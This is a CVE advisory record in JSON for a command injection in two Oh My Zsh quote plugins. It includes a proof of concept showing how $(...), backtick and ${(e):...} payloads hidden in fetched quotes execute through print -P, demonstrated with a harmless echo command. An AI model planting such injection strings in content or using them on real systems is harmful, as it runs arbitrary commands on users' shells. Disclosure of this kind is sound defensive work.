{"containers": {"cna": {"affected": [{"product": "ohmyzsh/ohmyzsh", "vendor": "ohmyzsh", "versions": [{"lessThan": "72928432", "status": "affected", "version": "unspecified", "versionType": "custom"}]}], "descriptions": [{"lang": "en", "value": "# Vulnerability in `rand-quote` and `hitokoto` plugins **Description**: the `rand-quote` and `hitokoto` plugins fetch quotes from quotationspage.com and hitokoto.cn respectively, do some processing on them and then use `print -P` to print them. If these quotes contain the right symbols, they can trigger command injection. Given that they come from external APIs, it's not possible to know whether the quotes are safe to use. **Fixed in**: [72928432](https://github.com/ohmyzsh/ohmyzsh/commit/72928432). **Impacted areas**: - `rand-quote` plugin (`quote` function). - `hitokoto` plugin (`hitokoto` function)."}], "exploits": [{"lang": "en", "value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Enable the `rand-quote` or `hitokoto` plugins.\n3. Optional: run the `quote` or `hitokoto` function in a precmd hook:\n\n ```zsh\n add-zsh-hook precmd quote\n add-zsh-hook precmd hitokoto\n ```\n\n4. 
Wait until a quote from either `quotationspage.com` or `hitokoto.cn` contains either\n `$(<injected-command>)`, <code>\\`\\<injected-command\\>\\`</code> or `${(e):-\"<injected-command>\"}`.\n\n - For the `rand-quote` plugin, this is what a malicious quote would look like (note the `$(echo PWNED)` part):\n\n ```plain\n ...\n <p>The following quotations were randomly selected from the collections selected below .</p><dl><dt class=\"quote\"><a title=\"Click for further information about this quotation\" href=\"/quote/31081.html\">Whatever you fear most has no power$(echo PWNED) - it is your fear that has the power.</a> </dt><dd class=\"author\"><div class=\"icons\"><a title=\"Further information about this quotation\" href=\"/quote/31081.html\"><img src=\"/icon_info.gif\" width=\"16\" height=\"16\" alt=\"[info]\" border=\"0\"></a><a title=\"Add to Your Quotations Page\" href=\"/myquotations.php?add=31081\"><img src=\"/icon_plus.gif\" width=\"16\" height=\"16\" alt=\"[add]\" border=\"0\"></a><a title=\"Email this quotation\" href=\"/quote/31081.html#email\"><img src=\"/icon_email.gif\" width=\"16\" height=\"16\" alt=\"[mail]\" border=\"0\"></a><img src=\"/icon_blank.gif\" width=\"16\" height=\"16\" alt=\"\" border=\"0\"></div><b><a href=\"/quotes/Oprah_Winfrey/\">Oprah Winfrey</a> (1954 - )</b>, <i>O Magazine</i></dd>\n ...\n ```\n\n Which would be printed by `print -P` as:\n\n ```console\n $ quote\n Oprah Winfrey: \u201cWhatever you fear most has no powerPWNED - it is your fear that has the power.\u201d\n ```\n\n Note that it's possible to submit your own quotes to quotationspage.com so this could be possible if moderators missed it.\n\n - For the `hitokoto` plugin, this is an example of a malicious quote (note the `$(echo PWNED)` part):\n\n ```plain\n {\"id\":7474,\"uuid\":\"0467d7cf-bca2-4cee-81ab-0b0640e51069\",\"hitokoto\":\"\u5979\u62e8\u5f04\u7434\u5f26\uff0c$(echo 
PWNED)\u626c\u8d77\u6f6e\u6c50\u3002\",\"type\":\"e\",\"from\":\"\u539f\u521b\",\"from_who\":\"\u6211\",\"creator\":\"\u9e22\u5c3e\",\"creator_uid\":9969,\"reviewer\":4756,\"commit_from\":\"web\",\"created_at\":\"1627968443\",\"length\":11}\n ```\n\n Which would be printed by `print -P` as:\n\n ```console\n $ hitokoto\n \u539f\u521b: \u201c\u5979\u62e8\u5f04\u7434\u5f26\uff0cPWNED\u626c\u8d77\u6f6e\u6c50\u3002\u201d\n ```\n\n `hitokoto.cn` also allows adding quotes to the database, so this could also be possible.\n"}], "metrics": [{"cvssV3_1": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}}], "problemTypes": [{"descriptions": [{"cweId": "CWE-78", "description": "CWE-78 OS Command Injection", "lang": "en", "type": "CWE"}]}], "providerMetadata": {"dateUpdated": "2021-11-30T09:30:17", "orgId": "c09c270a-b464-47c1-9133-acb35b22c19a", "shortName": "@huntrdev"}, "references": [{"tags": ["x_refsource_MISC"], "url": "https://github.com/ohmyzsh/ohmyzsh/commit/72928432"}], "title": "OS Command Injection in ohmyzsh/ohmyzsh", "x_legacyV4Record": {"CVE_data_meta": {"ASSIGNER": "security@huntr.dev", "ID": "CVE-2021-3727", "STATE": "PUBLIC", "TITLE": "OS Command Injection in ohmyzsh/ohmyzsh"}, "affects": {"vendor": {"vendor_data": [{"product": {"product_data": [{"product_name": "ohmyzsh/ohmyzsh", "version": {"version_data": [{"version_affected": "<", "version_value": "72928432"}]}}]}, "vendor_name": "ohmyzsh"}]}}, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": {"description_data": [{"lang": "eng", "value": "# Vulnerability in `rand-quote` and `hitokoto` plugins **Description**: the `rand-quote` and `hitokoto` plugins fetch quotes from quotationspage.com and hitokoto.cn respectively, do some processing on them and then use `print -P` to print them. If these quotes contain the right symbols, they can trigger command injection. Given that they come from external APIs, it's not possible to know whether the quotes are safe to use. **Fixed in**: [72928432](https://github.com/ohmyzsh/ohmyzsh/commit/72928432). **Impacted areas**: - `rand-quote` plugin (`quote` function). - `hitokoto` plugin (`hitokoto` function)."}]}, "exploit": [{"lang": "en", "value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Enable the `rand-quote` or `hitokoto` plugins.\n3. Optional: run the `quote` or `hitokoto` function in a precmd hook:\n\n ```zsh\n add-zsh-hook precmd quote\n add-zsh-hook precmd hitokoto\n ```\n\n4. Wait until a quote from either `quotationspage.com` or `hitokoto.cn` contains either\n `$(<injected-command>)`, <code>\\`\\<injected-command\\>\\`</code> or `${(e):-\"<injected-command>\"}`.\n\n - For the `rand-quote` plugin, this is what a malicious quote would look like (note the `$(echo PWNED)` part):\n\n ```plain\n ...\n <p>The following quotations were randomly selected from the collections selected below .</p><dl><dt class=\"quote\"><a title=\"Click for further information about this quotation\" href=\"/quote/31081.html\">Whatever you fear most has no power$(echo PWNED) - it is your fear that has the power.</a> </dt><dd class=\"author\"><div class=\"icons\"><a title=\"Further information about this quotation\" href=\"/quote/31081.html\"><img src=\"/icon_info.gif\" width=\"16\" height=\"16\" alt=\"[info]\" border=\"0\"></a><a title=\"Add to Your Quotations Page\" href=\"/myquotations.php?add=31081\"><img src=\"/icon_plus.gif\" width=\"16\" height=\"16\" alt=\"[add]\" border=\"0\"></a><a title=\"Email this quotation\" href=\"/quote/31081.html#email\"><img src=\"/icon_email.gif\" width=\"16\" height=\"16\" alt=\"[mail]\" border=\"0\"></a><img src=\"/icon_blank.gif\" width=\"16\" height=\"16\" alt=\"\" border=\"0\"></div><b><a 
href=\"/quotes/Oprah_Winfrey/\">Oprah Winfrey</a> (1954 - )</b>, <i>O Magazine</i></dd>\n ...\n ```\n\n Which would be printed by `print -P` as:\n\n ```console\n $ quote\n Oprah Winfrey: \u201cWhatever you fear most has no powerPWNED - it is your fear that has the power.\u201d\n ```\n\n Note that it's possible to submit your own quotes to quotationspage.com so this could be possible if moderators missed it.\n\n - For the `hitokoto` plugin, this is an example of a malicious quote (note the `$(echo PWNED)` part):\n\n ```plain\n {\"id\":7474,\"uuid\":\"0467d7cf-bca2-4cee-81ab-0b0640e51069\",\"hitokoto\":\"\u5979\u62e8\u5f04\u7434\u5f26\uff0c$(echo PWNED)\u626c\u8d77\u6f6e\u6c50\u3002\",\"type\":\"e\",\"from\":\"\u539f\u521b\",\"from_who\":\"\u6211\",\"creator\":\"\u9e22\u5c3e\",\"creator_uid\":9969,\"reviewer\":4756,\"commit_from\":\"web\",\"created_at\":\"1627968443\",\"length\":11}\n ```\n\n Which would be printed by `print -P` as:\n\n ```console\n $ hitokoto\n \u539f\u521b: \u201c\u5979\u62e8\u5f04\u7434\u5f26\uff0cPWNED\u626c\u8d77\u6f6e\u6c50\u3002\u201d\n ```\n\n `hitokoto.cn` also allows adding quotes to the database, so this could also be possible.\n"}], "impact": {"cvss": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}}, "problemtype": {"problemtype_data": [{"description": [{"lang": "eng", "value": "CWE-78 OS Command Injection"}]}]}, "references": {"reference_data": [{"name": "https://github.com/ohmyzsh/ohmyzsh/commit/72928432", "refsource": "MISC", "url": "https://github.com/ohmyzsh/ohmyzsh/commit/72928432"}]}}}, "adp": [{"providerMetadata": {"orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE", "dateUpdated": "2024-08-03T17:01:08.331Z"}, 
"title": "CVE Program Container", "references": [{"tags": ["x_refsource_MISC", "x_transferred"], "url": "https://github.com/ohmyzsh/ohmyzsh/commit/72928432"}]}]}, "cveMetadata": {"assignerOrgId": "c09c270a-b464-47c1-9133-acb35b22c19a", "assignerShortName": "@huntrdev", "cveId": "CVE-2021-3727", "datePublished": "2021-11-30T09:30:17", "dateReserved": "2021-08-19T00:00:00", "dateUpdated": "2024-08-03T17:01:08.331Z", "state": "PUBLISHED"}, "dataType": "CVE_RECORD", "dataVersion": "5.1"}